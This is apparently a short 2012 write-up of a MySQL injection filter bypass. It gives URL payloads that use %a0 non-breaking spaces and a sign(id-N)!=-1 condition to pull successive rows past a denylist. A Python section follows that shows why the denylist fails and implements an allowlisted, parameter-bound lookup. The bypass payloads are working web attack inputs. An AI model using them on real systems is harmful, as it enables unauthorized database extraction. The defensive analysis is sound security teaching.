/* ***************************************************************************************
 * MySQL Injection - getting records from a DB without using "<", ">" or "limit"         *
 * @Author : Twitter.com/PaulDS_FR                                                        *
 **************************************************************************************** */

So yesterday I was working on a SQL injection that was complicated to exploit... Basically the code was (I guess) something like this:

$blacklist = array('"', "'", ' ', ','); // simplified, the real one had a lot more in there!
$id = htmlentities(str_replace($blacklist, '', $_GET['id'])); // strips the listed characters, then turns < and > into HTML entities
$res = $dbh->query('select * from table where id= ' . $id)->fetch(PDO::FETCH_OBJ); // FETCH_OBJ so that $res->id below works
echo $res->id . $res->text;

So the first record is easy to get (classic SQL injection, which I'll not cover), but how do you go on and get the next row(s), knowing you can play neither with LIMIT (it requires a comma) nor with the "less than" (<) or "greater than" (>) operators, as they are converted into HTML entities (who does that, by the way!)?

Well, I figured this trick out:

?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-1)!=-1
?id=-1 union %a0 select %a0 column1,column2 %a0 from %a0 table %a0 where %a0 sign(id-2)!=-1
...

Without the %a0 used to insert an nbsp (which evades the blacklisting of spaces):

?id=-1 union select column1,column2 from table where sign(id-prev_id)!=-1

The important part is: where sign(id-prev_id)!=-1

It also worked (as was my case) to get other records from the same table without knowing their ids. I had 3 rows printed (ids 1, 2, 3) out of a count of 4 rows in the table... Where are you, little id?

?id=sign(id-4)!=-1
?id=sign(id)=-1

The id I was searching for was 1337 (of course :))

Ref:
http://dev.mysql.com/doc/refman/5.0/en/mathematical-functions.html#function_sign

Paul da Silva - 07/11/2012 - Pardon my English, I'm French ;)
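As an added illustration from the defender's side (this is not the author's code; the table name, column names and sample ids are assumptions), the Python below ports the page's denylist to show that it leaves the %a0 payload untouched, and beside it the fix the bug calls for: allowlist the id as a plain decimal integer and bind it as a query parameter instead of concatenating it into the SQL.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data standing in for the author's table: ids 1, 2, 3 and the "hidden" 1337.
ROWS = [(1, "first"), (2, "second"), (3, "third"), (1337, "hidden")]


def make_db():
    """In-memory SQLite table with the constructed rows (assumed schema: id, text)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (id INTEGER PRIMARY KEY, text TEXT)")
    conn.executemany("INSERT INTO t VALUES (?, ?)", ROWS)
    return conn


# The page's denylist, ported from the PHP str_replace() call. PHP's $_GET has
# already URL-decoded the parameter, so %a0 arrives as the single byte 0xA0;
# decoding as latin-1 here keeps that byte as U+00A0 instead of a UTF-8 error.
DENYLIST = ['"', "'", " ", ","]


def denylist_filter(raw_query_value):
    """Replicates the page's filter: removes the listed characters and passes everything else through."""
    s = unquote(raw_query_value, encoding="latin-1")
    for ch in DENYLIST:
        s = s.replace(ch, "")
    return s


# Allowlist instead: the id is only ever a short decimal integer, so accept exactly that and nothing else.
ID_RE = re.compile(r"[0-9]{1,10}")


def validate_id(raw_query_value):
    """Return the id as an int, or None if the value is not a plain decimal integer."""
    if ID_RE.fullmatch(raw_query_value) is None:
        return None
    return int(raw_query_value)


def lookup_safe(conn, raw_query_value):
    """Validated id bound as a query parameter; the driver never splices it into the SQL text."""
    row_id = validate_id(raw_query_value)
    if row_id is None:
        return None
    cur = conn.execute("SELECT id, text FROM t WHERE id = ?", (row_id,))
    return cur.fetchone()
```

Note that the denylist keeps the non-breaking space, the parentheses and the sign() call intact, which is exactly why character stripping cannot substitute for parameter binding.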